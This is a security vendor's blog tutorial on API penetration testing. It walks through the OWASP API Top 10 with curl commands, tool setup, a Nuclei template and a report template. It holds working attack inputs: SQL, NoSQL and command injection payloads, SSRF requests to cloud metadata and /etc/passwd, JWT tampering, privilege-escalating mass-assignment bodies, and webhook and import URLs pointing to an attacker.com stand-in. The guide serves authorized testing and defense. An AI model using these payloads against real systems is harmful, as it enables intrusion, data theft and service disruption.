Home/Blog/Cybersecurity/API Penetration Testing: Tools, Methodology, and OWASP API Top 10 Testing
Cybersecurity

API Penetration Testing: Tools, Methodology, and OWASP API Top 10 Testing

Learn how to perform API security testing with Burp Suite, OWASP ZAP, and automated tools. Covers OWASP API Top 10 vulnerabilities with practical testing techniques.

By Inventive HQ Team
API Penetration Testing: Tools, Methodology, and OWASP API Top 10 Testing

API penetration testing identifies vulnerabilities before attackers do. This guide covers methodology, tools, and techniques for testing the OWASP API Top 10 vulnerabilities.

API Pentesting Methodology

┌─────────────────────────────────────────────────────────────────────────────┐
│                      API PENETRATION TESTING PHASES                          │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│  1. RECONNAISSANCE                                                          │
│  ┌────────────────────────────────────────────────────────────────────┐    │
│  │ • API documentation review (OpenAPI, Swagger)                       │    │
│  │ • Endpoint discovery (fuzzing, JS analysis, mobile app reversing)  │    │
│  │ • Technology fingerprinting (headers, error messages)              │    │
│  │ • Authentication mechanism identification                           │    │
│  └────────────────────────────────────────────────────────────────────┘    │
│                              │                                               │
│                              ▼                                               │
│  2. MAPPING                                                                 │
│  ┌────────────────────────────────────────────────────────────────────┐    │
│  │ • Catalog all endpoints and methods                                 │    │
│  │ • Identify parameters and data types                               │    │
│  │ • Map authentication requirements                                   │    │
│  │ • Document authorization model                                      │    │
│  └────────────────────────────────────────────────────────────────────┘    │
│                              │                                               │
│                              ▼                                               │
│  3. VULNERABILITY TESTING                                                   │
│  ┌────────────────────────────────────────────────────────────────────┐    │
│  │ • OWASP API Top 10 testing                                         │    │
│  │ • Authentication/authorization bypass                               │    │
│  │ • Injection testing (SQL, NoSQL, Command)                          │    │
│  │ • Business logic testing                                            │    │
│  └────────────────────────────────────────────────────────────────────┘    │
│                              │                                               │
│                              ▼                                               │
│  4. EXPLOITATION & VALIDATION                                               │
│  ┌────────────────────────────────────────────────────────────────────┐    │
│  │ • Confirm vulnerabilities are exploitable                          │    │
│  │ • Assess real-world impact                                         │    │
│  │ • Chain vulnerabilities for greater impact                         │    │
│  │ • Document with evidence                                            │    │
│  └────────────────────────────────────────────────────────────────────┘    │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

Tools Setup

Burp Suite Configuration

# Start Burp with API-focused configuration
java -jar burpsuite_pro.jar

# Recommended extensions for API testing:
# - JSON Beautifier
# - JWT Editor
# - Autorize (authorization testing)
# - Param Miner (hidden parameter discovery)
# - Active Scan++ (enhanced scanning)

OWASP ZAP Setup

# Install ZAP
brew install zaproxy  # macOS
# or download from https://www.zaproxy.org/

# Start ZAP with API scanning mode
zap.sh -daemon -port 8080 -config api.key=your-api-key

# Import OpenAPI spec
curl "http://localhost:8080/JSON/openapi/action/importUrl/?url=https://api.example.com/openapi.json&apikey=your-api-key"

# Run active scan
curl "http://localhost:8080/JSON/ascan/action/scan/?url=https://api.example.com&apikey=your-api-key"

Postman Security Testing

// Postman pre-request script for auth testing
pm.environment.set("auth_token", pm.environment.get("valid_token"));

// Postman test script for security checks
pm.test("No sensitive data in response", () => {
  const response = pm.response.json();
  pm.expect(JSON.stringify(response)).to.not.include("password");
  pm.expect(JSON.stringify(response)).to.not.include("ssn");
});

pm.test("Proper status code", () => {
  pm.expect(pm.response.code).to.be.oneOf([200, 201, 204]);
});

pm.test("Security headers present", () => {
  pm.expect(pm.response.headers.get("X-Content-Type-Options")).to.eql("nosniff");
  pm.expect(pm.response.headers.get("Strict-Transport-Security")).to.exist;
});

OWASP API Top 10 Testing

API1: Broken Object Level Authorization (BOLA)

# Test BOLA by changing object IDs
# 1. Get your own resource
curl -H "Authorization: Bearer $TOKEN" \
  "https://api.example.com/users/123/profile"

# 2. Try accessing another user's resource
curl -H "Authorization: Bearer $TOKEN" \
  "https://api.example.com/users/124/profile"  # Different ID

# 3. Try predictable IDs
for id in $(seq 1 100); do
  response=$(curl -s -o /dev/null -w "%{http_code}" \
    -H "Authorization: Bearer $TOKEN" \
    "https://api.example.com/users/$id/profile")
  if [ "$response" = "200" ]; then
    echo "Accessible: $id"
  fi
done

# 4. Test with UUIDs from other sessions
curl -H "Authorization: Bearer $TOKEN" \
  "https://api.example.com/orders/550e8400-e29b-41d4-a716-446655440000"

API2: Broken Authentication

# Test authentication weaknesses
# 1. Access without token
curl "https://api.example.com/api/users"

# 2. Test with expired token
curl -H "Authorization: Bearer $EXPIRED_TOKEN" \
  "https://api.example.com/api/users"

# 3. Test with malformed token
curl -H "Authorization: Bearer invalid.token.here" \
  "https://api.example.com/api/users"

# 4. JWT manipulation (use jwt_tool)
# Decode JWT
echo "$TOKEN" | cut -d'.' -f2 | base64 -d 2>/dev/null

# Change algorithm to none
python3 jwt_tool.py "$TOKEN" -X a

# Change user ID in payload
python3 jwt_tool.py "$TOKEN" -I -pc user_id -pv "admin"

API3: Broken Object Property Level Authorization

# Test for accessing unauthorized fields
# 1. Check response for sensitive fields you shouldn't see
curl -H "Authorization: Bearer $USER_TOKEN" \
  "https://api.example.com/users/me" | jq .

# Look for fields like: password_hash, ssn, internal_notes, admin_flags

# 2. Test field-level filtering
curl -H "Authorization: Bearer $USER_TOKEN" \
  "https://api.example.com/users/me?fields=password_hash,ssn"

# 3. GraphQL field exposure
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"query": "{ user(id: 1) { name email passwordHash internalNotes }}"}' \
  "https://api.example.com/graphql"

API4: Unrestricted Resource Consumption

# Test rate limiting and resource exhaustion
# 1. Rapid requests to test rate limiting
for i in $(seq 1 100); do
  curl -s -o /dev/null -w "%{http_code}\n" \
    "https://api.example.com/api/search?q=test" &
done
wait

# 2. Large payload test
curl -X POST \
  -H "Content-Type: application/json" \
  -d "{\"data\": \"$(python3 -c 'print("A" * 10000000)')\"}" \
  "https://api.example.com/api/upload"

# 3. Complex query (GraphQL)
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"query": "{ users { friends { friends { friends { friends { name }}}}}}"}' \
  "https://api.example.com/graphql"

# 4. Pagination abuse
curl "https://api.example.com/api/users?limit=999999&offset=0"

API5: Broken Function Level Authorization

# Test access to privileged functions
# 1. Access admin endpoints as regular user
curl -H "Authorization: Bearer $USER_TOKEN" \
  "https://api.example.com/admin/users"

curl -H "Authorization: Bearer $USER_TOKEN" \
  -X DELETE "https://api.example.com/admin/users/123"

# 2. Test method-based auth bypass
curl -H "Authorization: Bearer $USER_TOKEN" \
  -X GET "https://api.example.com/admin/config"  # May be blocked

curl -H "Authorization: Bearer $USER_TOKEN" \
  -X OPTIONS "https://api.example.com/admin/config"  # May work

# 3. Test internal endpoints
curl "https://api.example.com/internal/metrics"
curl "https://api.example.com/debug/vars"
curl "https://api.example.com/actuator/health"

API6: Server-Side Request Forgery (SSRF)

# Test parameters that accept URLs
# 1. Internal network access
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"url": "http://localhost:8080/admin"}' \
  "https://api.example.com/api/fetch"

curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"url": "http://127.0.0.1:22"}' \
  "https://api.example.com/api/preview"

# 2. Cloud metadata endpoints
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}' \
  "https://api.example.com/api/import"

# 3. Internal service discovery
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"url": "http://internal-api.local/health"}' \
  "https://api.example.com/api/webhook"

# 4. Protocol smuggling
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"url": "file:///etc/passwd"}' \
  "https://api.example.com/api/download"

API7: Security Misconfiguration

# Test for misconfigurations
# 1. Verbose error messages
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"email": "not-an-email"}' \
  "https://api.example.com/api/users"
# Check for stack traces, SQL errors, internal paths

# 2. Debug endpoints
curl "https://api.example.com/debug"
curl "https://api.example.com/phpinfo.php"
curl "https://api.example.com/server-status"
curl "https://api.example.com/.env"

# 3. CORS misconfiguration
curl -H "Origin: https://evil.com" \
  -I "https://api.example.com/api/users"
# Check Access-Control-Allow-Origin

# 4. Missing security headers
curl -I "https://api.example.com/api/users" | grep -iE "x-frame|x-content|strict-transport|content-security"

# 5. HTTP methods
curl -X OPTIONS "https://api.example.com/api/users"
curl -X TRACE "https://api.example.com/api/users"

API8: Injection

# SQL Injection testing
# 1. Error-based SQL injection
curl "https://api.example.com/api/users?id=1'"
curl "https://api.example.com/api/users?id=1 OR 1=1--"
curl "https://api.example.com/api/search?q=' UNION SELECT username,password FROM users--"

# 2. NoSQL injection (MongoDB)
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}' \
  "https://api.example.com/api/login"

curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "admin.*"}}' \
  "https://api.example.com/api/search"

# 3. Command injection
curl "https://api.example.com/api/ping?host=127.0.0.1;id"
curl "https://api.example.com/api/convert?file=test.pdf|cat /etc/passwd"

# 4. Use sqlmap for automated SQL injection testing
sqlmap -u "https://api.example.com/api/users?id=1" \
  --headers="Authorization: Bearer $TOKEN" \
  --dbs

API9: Improper Asset Management

# Find undocumented or old API versions
# 1. Version discovery
for v in v1 v2 v3 beta dev staging old legacy; do
  response=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://api.example.com/$v/users")
  echo "$v: $response"
done

# 2. Subdomain enumeration
amass enum -d example.com | grep api

# 3. Historical endpoints (Wayback Machine)
curl "http://web.archive.org/cdx/search/cdx?url=api.example.com/*&output=json"

# 4. JS file analysis for hidden endpoints
curl -s "https://example.com/app.js" | grep -oE '/api/[a-zA-Z0-9/_-]+'

API10: Unsafe Consumption of APIs

# Test how API handles external data
# 1. Webhook injection
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"callback_url": "https://attacker.com/capture?data="}' \
  "https://api.example.com/api/webhooks"

# 2. External data validation
# If API fetches and processes external URLs
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"import_url": "https://attacker.com/malicious.xml"}' \
  "https://api.example.com/api/import"

Mass Assignment Testing

# Test for mass assignment vulnerabilities
# 1. Add unauthorized fields to create request
curl -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Test User",
    "email": "[email protected]",
    "role": "admin",
    "isAdmin": true,
    "verified": true,
    "balance": 1000000
  }' \
  "https://api.example.com/api/users"

# 2. Check if fields were set
curl -H "Authorization: Bearer $TOKEN" \
  "https://api.example.com/api/users/me" | jq .

# 3. Test on update endpoints
curl -X PATCH \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"role": "admin", "permissions": ["all"]}' \
  "https://api.example.com/api/users/me"

Automated Testing with Nuclei

# nuclei-templates/api-bola.yaml
id: api-bola-test

info:
  name: API BOLA Test
  severity: high
  description: Tests for Broken Object Level Authorization

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/users/{{user_id}}"
    headers:
      Authorization: "Bearer {{token}}"
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "email"
          - "name"
        condition: and

# Run Nuclei with API templates
nuclei -u https://api.example.com -t api-security/ \
  -H "Authorization: Bearer $TOKEN"

Reporting Template

# API Penetration Test Report

## Executive Summary
- **Client**: Example Corp
- **Target**: api.example.com
- **Testing Period**: Jan 15-17, 2025
- **Risk Rating**: HIGH (3 Critical, 5 High, 8 Medium findings)

## Critical Findings

### 1. Broken Object Level Authorization (BOLA) - Critical
**CVSS**: 9.1 | **Endpoint**: /api/users/{id}/profile

**Description**: Any authenticated user can access any other user's profile by changing the user ID parameter.

**Evidence**:

As User A (ID: 123)

curl -H "Authorization: Bearer $TOKEN_A"
"https://api.example.com/api/users/456/profile"

Response: User B's private data returned

{"id": 456, "email": "[email protected]", "ssn": "xxx-xx-xxxx"}


**Impact**: Complete compromise of user data confidentiality. Attackers can enumerate and access all user profiles.

**Remediation**:
```javascript
// Add authorization check
async function getProfile(req, res) {
  const requestedId = req.params.id;
  const currentUserId = req.user.id;

  if (requestedId !== currentUserId && !req.user.isAdmin) {
    return res.status(403).json({ error: 'Forbidden' });
  }
  // ...
}

[Continue for each finding...]


## Best Practices

1. **Get authorization** - Written scope and permission before testing
2. **Use safe testing data** - Don't test with production data
3. **Test in staging first** - Avoid impacting production
4. **Document everything** - Record all requests and responses
5. **Report responsibly** - Follow coordinated disclosure
6. **Automate regression tests** - Add tests for found vulnerabilities
7. **Test authentication thoroughly** - Most APIs have auth flaws
8. **Think like an attacker** - What would you want to access?
9. **Chain vulnerabilities** - Combine low-severity issues for impact
10. **Retest after fixes** - Verify remediations are effective

## Next Steps

- **[API Security Complete Guide](/blog/api-security-complete-guide)** - Comprehensive security overview
- **[API Security Testing Workflow](/blog/api-security-testing-workflow)** - Systematic testing approach
- **[API Input Validation](/blog/api-input-validation-guide)** - Prevent injection attacks
- **[GraphQL Security](/blog/graphql-security-guide)** - GraphQL-specific testing

Frequently Asked Questions

Find answers to common questions

API penetration testing specifically targets API endpoints, focusing on business logic, authentication, authorization, and data validation rather than UI-based attacks like XSS. APIs often lack the protections of web frameworks (CSRF tokens, built-in encoding) and expose more direct access to data and functions. Testing requires understanding request/response structures, authentication flows, and API-specific vulnerabilities like BOLA and mass assignment.

Essential tools include Burp Suite (proxy, scanner, repeater for manual testing), OWASP ZAP (free alternative with API scan capabilities), Postman (API exploration and automated testing), curl/httpie (command-line requests), and jq (JSON parsing). For automated scanning, consider OWASP Amass (discovery), Nuclei (vulnerability templates), and Arjun (parameter discovery). For auth testing, jwt_tool and OAuth testing tools.

BOLA (#1 on OWASP API Top 10) occurs when APIs don't verify users can access specific objects. Test by: authenticating as User A, making requests for User A's resources, then changing IDs to access User B's resources. Try sequential IDs (1, 2, 3), UUIDs from other sessions, and predictable patterns. If you can access other users' data, BOLA exists. Test all endpoints that accept object identifiers.

Test authentication by attempting endpoints without tokens, with expired tokens, with modified tokens (change user ID in JWT), and with tokens from other environments. Test authorization by accessing admin endpoints as regular users, accessing other users' resources, and testing all HTTP methods (GET might work when POST is blocked). Map which endpoints require auth and verify each one enforces it.

The OWASP API Top 10 (2023) lists the most critical API security risks. Key ones: API1 BOLA (change object IDs), API2 Broken Authentication (token manipulation), API3 Broken Object Property Level Authorization (access hidden fields), API4 Unrestricted Resource Consumption (DoS via heavy requests), API5 Broken Function Level Authorization (access admin functions), API6 SSRF (inject URLs in parameters), API7 Security Misconfiguration (verbose errors, exposed endpoints).

Send rapid requests to determine rate limit thresholds. Test if limits apply per-IP, per-user, per-endpoint, or globally. Try bypass techniques: different HTTP methods, URL encoding variations, adding headers (X-Forwarded-For), using different API versions, and sending batch requests. Verify 429 responses include Retry-After headers. Test if rate limits prevent actual abuse or just slow it down.

Test SQL injection by inserting payloads in all parameters: ' OR '1'='1, 1; DROP TABLE--, UNION SELECT. Test NoSQL injection with MongoDB operators: {"$gt": ""}, {"$where": "1==1"}. Test command injection if parameters might reach shell: ; ls, | cat /etc/passwd. Test SSRF by inserting internal URLs: http://localhost, http://169.254.169.254 (cloud metadata). Watch for error messages revealing injection success.

Mass assignment occurs when APIs accept fields that shouldn't be user-modifiable. Test by adding extra fields to requests: isAdmin:true, role:"admin", balance:1000000, verified:true. Check if the API accepts and persists these fields. Review API responses for fields that exist in the data model but aren't in the request schema—try setting those. Test on registration, profile update, and any endpoint accepting object data.

Use both. Automated scanners (Burp Scanner, ZAP, Nuclei) find common vulnerabilities quickly but miss business logic flaws. Manual testing finds BOLA, authorization bypasses, and logic vulnerabilities that require understanding the application. Start with automated scanning to find low-hanging fruit, then manually test authentication flows, authorization matrices, and business-critical functions.

Include: executive summary (risk overview for management), methodology (tools, scope, approach), findings with CVSS scores and evidence (requests/responses), risk ratings (critical/high/medium/low), reproduction steps (curl commands), business impact explanation, remediation recommendations with code examples, and appendices (full request/response logs). Prioritize findings by exploitability and impact.

Secure Your APIs

Our API pentest covers OWASP API Top 10 and identifies authentication, authorization, and injection flaws.

Learn About Penetration TestingExplore DevSecOps Services

Related Tools

🎫

JWT Decoder

Decode and analyze JSON Web Tokens with security validation

SecurityTry it →
🔣

Base64 Encoder/Decoder

Encode and decode Base64, Hex, Binary, and other formats with file support

SecurityTry it →

Related Articles

Formal Security Models Explained: Bell-LaPadula, Biba, Clark-Wilson, and Beyond

Formal Security Models Explained: Bell-LaPadula, Biba, Clark-Wilson, and Beyond

Master the formal security models that underpin all access control systems. This comprehensive guide covers Bell-LaPadula, Biba, Clark-Wilson, Brewer-Nash, lattice-based access control, and how to choose the right model for your organization.

Biometric Authentication: Understanding FAR, FRR, and CER for Security Professionals

Biometric Authentication: Understanding FAR, FRR, and CER for Security Professionals

Master the critical metrics behind biometric authentication systems including False Acceptance Rate (FAR), False Rejection Rate (FRR), and Crossover Error Rate (CER). Learn how to evaluate, tune, and deploy biometric systems across enterprise, consumer, and high-security environments.

Database Inference & Aggregation Attacks: The Complete Defense Guide

Database Inference & Aggregation Attacks: The Complete Defense Guide

Learn how inference and aggregation attacks exploit aggregate queries and combined data to reveal protected information, and discover proven countermeasures including differential privacy, polyinstantiation, and query restriction controls.

NIST 800-88 Media Sanitization Complete Guide: Clear, Purge, and Destroy Methods Explained

NIST 800-88 Media Sanitization Complete Guide: Clear, Purge, and Destroy Methods Explained

Master NIST SP 800-88 Rev. 1 media sanitization methods including Clear, Purge, and Destroy. Covers SSD vs HDD sanitization, crypto erase, degaussing, regulatory compliance, and building a media sanitization program.

Physical Security & CPTED: The Complete Guide to Protecting Facilities, Data Centers, and Critical Assets

Physical Security & CPTED: The Complete Guide to Protecting Facilities, Data Centers, and Critical Assets

A comprehensive guide to physical security covering CPTED principles, security zones, access control, fire suppression, and environmental controls for protecting facilities and data centers.

Threat Modeling with STRIDE and DREAD: A Complete Guide to Proactive Security Architecture

Threat Modeling with STRIDE and DREAD: A Complete Guide to Proactive Security Architecture

Master threat modeling with STRIDE and DREAD frameworks to identify, classify, and prioritize security threats before they become vulnerabilities. This comprehensive guide covers data flow diagrams, mitigation mappings, MITRE ATT&CK integration, and building an enterprise threat modeling program.